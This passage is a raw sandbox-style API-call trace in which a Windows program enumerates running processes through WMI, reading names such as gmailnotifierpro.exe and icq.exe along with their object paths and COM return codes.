wszName="__GENUS", lFlags=0, pVal=0x43ea64*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x43eae4*=0, plFlavor=0x43eae0*=0 | out: pVal=0x43ea64*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x43eae4*=3, plFlavor=0x43eae0*=64) returned 0x0 [0279.406] IWbemClassObject:Get (in: This=0x5704b38, wszName="__PATH", lFlags=0, pVal=0x43ea48*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x43eacc*=0, plFlavor=0x43eac8*=0 | out: pVal=0x43ea48*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2904\"", varVal2=0x0), pType=0x43eacc*=8, plFlavor=0x43eac8*=64) returned 0x0 [0279.406] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2904\"") returned 0x66 [0279.406] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2904\"") returned 0x66 [0279.406] CoGetObjectContext (in: riid=0x277dff0*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x43ea74 | out: ppv=0x43ea74*=0x500344) returned 0x0 [0279.406] IComThreadingInfo:GetCurrentApartmentType (in: This=0x500344, pAptType=0x43ea6c | out: pAptType=0x43ea6c*=1) returned 0x0 [0279.406] IUnknown:QueryInterface (in: This=0x500344, riid=0x277dfcc*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x43ea70 | out: ppvObject=0x43ea70*=0x0) returned 0x80004002 [0279.406] IUnknown:Release (This=0x500344) returned 0x1 [0279.407] CoGetClassObject (in: rclsid=0x5aa304*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x71ea6bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x43e3e0 | out: ppv=0x43e3e0*=0x570aff8) returned 0x0 [0279.408] WbemDefPath:IUnknown:QueryInterface (in: This=0x570aff8, riid=0x71e6dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x43e5f8 | out: ppvObject=0x43e5f8*=0x0) returned 0x80004002 [0279.408] WbemDefPath:IClassFactory:CreateInstance (in: This=0x570aff8, pUnkOuter=0x0, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43e604 | out: ppvObject=0x43e604*=0x5702c10) returned 0x0 [0279.408] WbemDefPath:IUnknown:Release (This=0x570aff8) returned 0x0 [0279.408] WbemDefPath:IUnknown:QueryInterface (in: This=0x5702c10, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43e224 | out: ppvObject=0x43e224*=0x5702c10) returned 0x0 [0279.408] WbemDefPath:IUnknown:QueryInterface (in: This=0x5702c10, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x43e1d8 | out: ppvObject=0x43e1d8*=0x0) returned 0x80004002 [0279.408] WbemDefPath:IUnknown:AddRef (This=0x5702c10) returned 0x3 [0279.408] WbemDefPath:IUnknown:QueryInterface (in: This=0x5702c10, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x43db34 | out: ppvObject=0x43db34*=0x0) returned 0x80004002 [0279.408] WbemDefPath:IUnknown:QueryInterface (in: This=0x5702c10, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x43dae4 | out: ppvObject=0x43dae4*=0x0) returned 0x80004002 [0279.408] WbemDefPath:IUnknown:QueryInterface (in: This=0x5702c10, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43daf0 | out: ppvObject=0x43daf0*=0x570b008) returned 0x0 [0279.408] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x570b008, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x43daf8 | out: pCid=0x43daf8*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0279.408] WbemDefPath:IUnknown:Release (This=0x570b008) returned 0x3 [0279.409] WbemDefPath:IUnknown:QueryInterface (in: This=0x5702c10, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43dfe4 | out: ppvObject=0x43dfe4*=0x0) returned 0x80004002 [0279.409] WbemDefPath:IUnknown:Release (This=0x5702c10) returned 0x2 [0279.409] WbemDefPath:IUnknown:Release (This=0x5702c10) returned 0x1 [0279.409] WbemDefPath:IUnknown:QueryInterface (in: This=0x5702c10, riid=0x43e924*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x43e920 | out: ppvObject=0x43e920*=0x5702c10) returned 0x0 [0279.409] WbemDefPath:IUnknown:AddRef (This=0x5702c10) returned 0x3 [0279.409] WbemDefPath:IUnknown:Release (This=0x5702c10) returned 0x2 [0279.409] WbemDefPath:IWbemPath:SetText (This=0x5702c10, uMode=0x4, pszPath="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2904\"") returned 0x0 [0279.409] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5a8ed8, puCount=0x43eaa0 | out: puCount=0x43eaa0*=0x2) returned 0x0 [0279.409] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea9c*=0x0, pszText=0x0 | out: puBuffLength=0x43ea9c*=0xf, pszText=0x0) returned 0x0 [0279.409] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea9c*=0xf, pszText="00000000000000" | out: puBuffLength=0x43ea9c*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0279.409] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5a8ed8, puCount=0x43ea6c | out: puCount=0x43ea6c*=0x2) returned 0x0 [0279.409] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea68*=0x0, pszText=0x0 | out: puBuffLength=0x43ea68*=0xf, pszText=0x0) returned 0x0 [0279.409] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea68*=0xf, pszText="00000000000000" | out: puBuffLength=0x43ea68*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0279.409] IWbemClassObject:Get (in: This=0x5704b38, wszName="Name", lFlags=0, pVal=0x43ea68*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x27cb9dc*=0, plFlavor=0x27cb9e0*=0 | out: pVal=0x43ea68*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="gmailnotifierpro.exe", varVal2=0x0), pType=0x27cb9dc*=8, plFlavor=0x27cb9e0*=0) returned 0x0 [0279.410] SysStringByteLen (bstr="gmailnotifierpro.exe") returned 0x28 [0279.410] SysStringByteLen (bstr="gmailnotifierpro.exe") returned 0x28 [0279.410] IWbemClassObject:Get (in: This=0x5704b38, wszName="Name", lFlags=0, pVal=0x43ea70*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x27cb9dc*=8, plFlavor=0x27cb9e0*=0 | out: pVal=0x43ea70*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="gmailnotifierpro.exe", varVal2=0x0), pType=0x27cb9dc*=8, plFlavor=0x27cb9e0*=0) returned 0x0 [0279.410] SysStringByteLen (bstr="gmailnotifierpro.exe") returned 0x28 [0279.410] SysStringByteLen (bstr="gmailnotifierpro.exe") returned 0x28 [0279.410] CoTaskMemAlloc (cb=0x4) returned 0x570b038 [0279.410] IEnumWbemClassObject:Next (in: This=0x5115f8, lTimeout=-1, uCount=0x1, apObjects=0x570b038, puReturned=0x27bb39c | out: apObjects=0x570b038*=0x5704cd0, puReturned=0x27bb39c*=0x1) returned 0x0 [0279.411] IUnknown:QueryInterface (in: This=0x5704cd0, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43e0cc | out: ppvObject=0x43e0cc*=0x5704cd0) returned 0x0 [0279.411] IUnknown:QueryInterface (in: This=0x5704cd0, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x43e080 | out: ppvObject=0x43e080*=0x0) returned 0x80004002 [0279.411] IUnknown:QueryInterface (in: This=0x5704cd0, riid=0x71e41e84*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x43dea8 | out: ppvObject=0x43dea8*=0x0) returned 0x80004002 [0279.411] IUnknown:AddRef (This=0x5704cd0) returned 0x3 [0279.412] IUnknown:QueryInterface (in: This=0x5704cd0, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x43d9dc | out: ppvObject=0x43d9dc*=0x0) returned 0x80004002 [0279.412] IUnknown:QueryInterface (in: This=0x5704cd0, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x43d98c | out: ppvObject=0x43d98c*=0x0) returned 0x80004002 [0279.412] IUnknown:QueryInterface (in: This=0x5704cd0, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43d998 | out: ppvObject=0x43d998*=0x5704cd4) returned 0x0 [0279.412] IMarshal:GetUnmarshalClass (in: This=0x5704cd4, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x43d9a0 | out: pCid=0x43d9a0*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0279.412] IUnknown:Release (This=0x5704cd4) returned 0x3 [0279.412] IUnknown:QueryInterface (in: This=0x5704cd0, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43de8c | out: ppvObject=0x43de8c*=0x0) returned 0x80004002 [0279.412] IUnknown:Release (This=0x5704cd0) returned 0x2 [0279.412] IUnknown:QueryInterface (in: This=0x5704cd0, riid=0x43e424*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x43e420 | out: ppvObject=0x43e420*=0x5704cd0) returned 0x0 [0279.412] IUnknown:AddRef (This=0x5704cd0) returned 0x4 [0279.412] IUnknown:Release (This=0x5704cd0) returned 0x3 [0279.413] IUnknown:Release (This=0x5704cd0) returned 0x2 [0279.413] CoTaskMemFree (pv=0x570b038) [0279.413] IUnknown:AddRef (This=0x5704cd0) returned 0x3 [0279.413] IWbemClassObject:Get (in: This=0x5704cd0, wszName="__GENUS", lFlags=0, pVal=0x43ea64*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x43eae4*=0, plFlavor=0x43eae0*=0 | out: pVal=0x43ea64*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x43eae4*=3, plFlavor=0x43eae0*=64) returned 0x0 [0279.414] IWbemClassObject:Get (in: This=0x5704cd0, wszName="__PATH", lFlags=0, pVal=0x43ea48*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x43eacc*=0, plFlavor=0x43eac8*=0 | out: pVal=0x43ea48*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2912\"", varVal2=0x0), pType=0x43eacc*=8, plFlavor=0x43eac8*=64) returned 0x0 [0279.414] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2912\"") returned 0x66 [0279.414] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2912\"") returned 0x66 [0279.414] IComThreadingInfo:GetCurrentApartmentType (in: This=0x500344, pAptType=0x43ea6c | out: pAptType=0x43ea6c*=1) returned 0x0 [0279.414] IUnknown:QueryInterface (in: This=0x500344, riid=0x277dfcc*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x43ea70 | out: ppvObject=0x43ea70*=0x0) returned 0x80004002 [0279.414] IUnknown:Release (This=0x500344) returned 0x1 [0279.415] CoGetClassObject (in: rclsid=0x5aa304*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x71ea6bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x43e3e0 | out: ppv=0x43e3e0*=0x570b038) returned 0x0 [0279.415] WbemDefPath:IUnknown:QueryInterface (in: This=0x570b038, riid=0x71e6dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x43e5f8 | out: ppvObject=0x43e5f8*=0x0) returned 0x80004002 [0279.415] WbemDefPath:IClassFactory:CreateInstance (in: This=0x570b038, pUnkOuter=0x0, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43e604 | out: ppvObject=0x43e604*=0x5702cf0) returned 0x0 [0279.416] WbemDefPath:IUnknown:Release (This=0x570b038) returned 0x0 [0279.416] WbemDefPath:IUnknown:QueryInterface (in: This=0x5702cf0, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43e224 | out: ppvObject=0x43e224*=0x5702cf0) returned 0x0 [0279.416] WbemDefPath:IUnknown:QueryInterface (in: This=0x5702cf0, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x43e1d8 | out: ppvObject=0x43e1d8*=0x0) returned 0x80004002 [0279.416] WbemDefPath:IUnknown:AddRef (This=0x5702cf0) returned 0x3 [0279.416] WbemDefPath:IUnknown:QueryInterface (in: This=0x5702cf0, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x43db34 | out: ppvObject=0x43db34*=0x0) returned 0x80004002 [0279.416] WbemDefPath:IUnknown:QueryInterface (in: This=0x5702cf0, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x43dae4 | out: ppvObject=0x43dae4*=0x0) returned 0x80004002 [0279.416] WbemDefPath:IUnknown:QueryInterface (in: This=0x5702cf0, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43daf0 | out: ppvObject=0x43daf0*=0x570b048) returned 0x0 [0279.416] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x570b048, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x43daf8 | out: pCid=0x43daf8*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0279.416] WbemDefPath:IUnknown:Release (This=0x570b048) returned 0x3 [0279.417] WbemDefPath:IUnknown:QueryInterface (in: This=0x5702cf0, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43dfe4 | out: ppvObject=0x43dfe4*=0x0) returned 0x80004002 [0279.417] WbemDefPath:IUnknown:Release (This=0x5702cf0) returned 0x2 [0279.417] WbemDefPath:IUnknown:Release (This=0x5702cf0) returned 0x1 [0279.417] WbemDefPath:IUnknown:QueryInterface (in: This=0x5702cf0, riid=0x43e924*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x43e920 | out: ppvObject=0x43e920*=0x5702cf0) returned 0x0 [0279.417] WbemDefPath:IUnknown:AddRef (This=0x5702cf0) returned 0x3 [0279.417] WbemDefPath:IUnknown:Release (This=0x5702cf0) returned 0x2 [0279.417] WbemDefPath:IWbemPath:SetText (This=0x5702cf0, uMode=0x4, pszPath="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2912\"") returned 0x0 [0279.418] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5a8ed8, puCount=0x43eaa0 | out: puCount=0x43eaa0*=0x2) returned 0x0 [0279.418] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea9c*=0x0, pszText=0x0 | out: puBuffLength=0x43ea9c*=0xf, pszText=0x0) returned 0x0 [0279.418] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea9c*=0xf, pszText="00000000000000" | out: puBuffLength=0x43ea9c*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0279.418] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5a8ed8, puCount=0x43ea6c | out: puCount=0x43ea6c*=0x2) returned 0x0 [0279.418] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea68*=0x0, pszText=0x0 | out: puBuffLength=0x43ea68*=0xf, pszText=0x0) returned 0x0 [0279.418] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea68*=0xf, pszText="00000000000000" | out: puBuffLength=0x43ea68*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0279.418] IWbemClassObject:Get (in: This=0x5704cd0, wszName="Name", lFlags=0, pVal=0x43ea68*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x27cc27c*=0, plFlavor=0x27cc280*=0 | out: pVal=0x43ea68*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="icq.exe", varVal2=0x0), pType=0x27cc27c*=8, plFlavor=0x27cc280*=0) returned 0x0 [0279.419] SysStringByteLen (bstr="icq.exe") returned 0xe [0279.419] SysStringByteLen (bstr="icq.exe") returned 0xe [0279.419] IWbemClassObject:Get (in: This=0x5704cd0, wszName="Name", lFlags=0, pVal=0x43ea70*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x27cc27c*=8, plFlavor=0x27cc280*=0 | out: pVal=0x43ea70*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="icq.exe", varVal2=0x0), pType=0x27cc27c*=8, plFlavor=0x27cc280*=0) returned 0x0 [0279.419] SysStringByteLen (bstr="icq.exe") returned 0xe [0279.419] SysStringByteLen (bstr="icq.exe") returned 0xe [0279.419] IEnumWbemClassObject:Next (in: This=0x5115f8, lTimeout=-1, uCount=0x1, apObjects=0x570b078, puReturned=0x27bb39c | out: apObjects=0x570b078*=0x5704e68, puReturned=0x27bb39c*=0x1) returned 0x0 [0279.420] IUnknown:QueryInterface (in: This=0x5704e68, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43e0cc | out: ppvObject=0x43e0cc*=0x5704e68) returned 0x0 [0279.420] IUnknown:QueryInterface (in: This=0x5704e68, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x43e080 | out: ppvObject=0x43e080*=0x0) returned 0x80004002 [0279.420] IUnknown:QueryInterface (in: This=0x5704e68, riid=0x71e41e84*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x43dea8 | out: ppvObject=0x43dea8*=0x0) returned 0x80004002 [0279.421] IUnknown:AddRef (This=0x5704e68) returned 0x3 [0279.421] IUnknown:QueryInterface (in: This=0x5704e68, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x43d9dc | out: ppvObject=0x43d9dc*=0x0) returned 0x80004002 [0279.421] IUnknown:QueryInterface (in: This=0x5704e68, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x43d98c | out: ppvObject=0x43d98c*=0x0) returned 0x80004002 [0279.421] IUnknown:QueryInterface (in: This=0x5704e68, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43d998 | out: ppvObject=0x43d998*=0x5704e6c) returned 0x0 [0279.421] IMarshal:GetUnmarshalClass (in: This=0x5704e6c, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x43d9a0 | out: pCid=0x43d9a0*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0279.421] IUnknown:Release (This=0x5704e6c) returned 0x3 [0279.421] IUnknown:QueryInterface (in: This=0x5704e68, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43de8c | out: ppvObject=0x43de8c*=0x0) returned 0x80004002 [0279.421] IUnknown:Release (This=0x5704e68) returned 0x2 [0279.421] IUnknown:QueryInterface (in: This=0x5704e68, riid=0x43e424*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x43e420 | out: ppvObject=0x43e420*=0x5704e68) returned 0x0 [0279.422] IUnknown:AddRef (This=0x5704e68) returned 0x4 [0279.422] IUnknown:Release (This=0x5704e68) returned 0x3 [0279.422] IUnknown:Release (This=0x5704e68) returned 0x2 [0279.422] CoTaskMemFree (pv=0x570b078) [0279.422] IUnknown:AddRef (This=0x5704e68) returned 0x3 [0279.422] IWbemClassObject:Get (in: This=0x5704e68, wszName="__GENUS", lFlags=0, pVal=0x43ea64*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x43eae4*=0, plFlavor=0x43eae0*=0 | out: pVal=0x43ea64*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x43eae4*=3, plFlavor=0x43eae0*=64) returned 0x0 [0279.423] IWbemClassObject:Get (in: This=0x5704e68, wszName="__PATH", lFlags=0, pVal=0x43ea48*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x43eacc*=0, plFlavor=0x43eac8*=0 | out: pVal=0x43ea48*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, 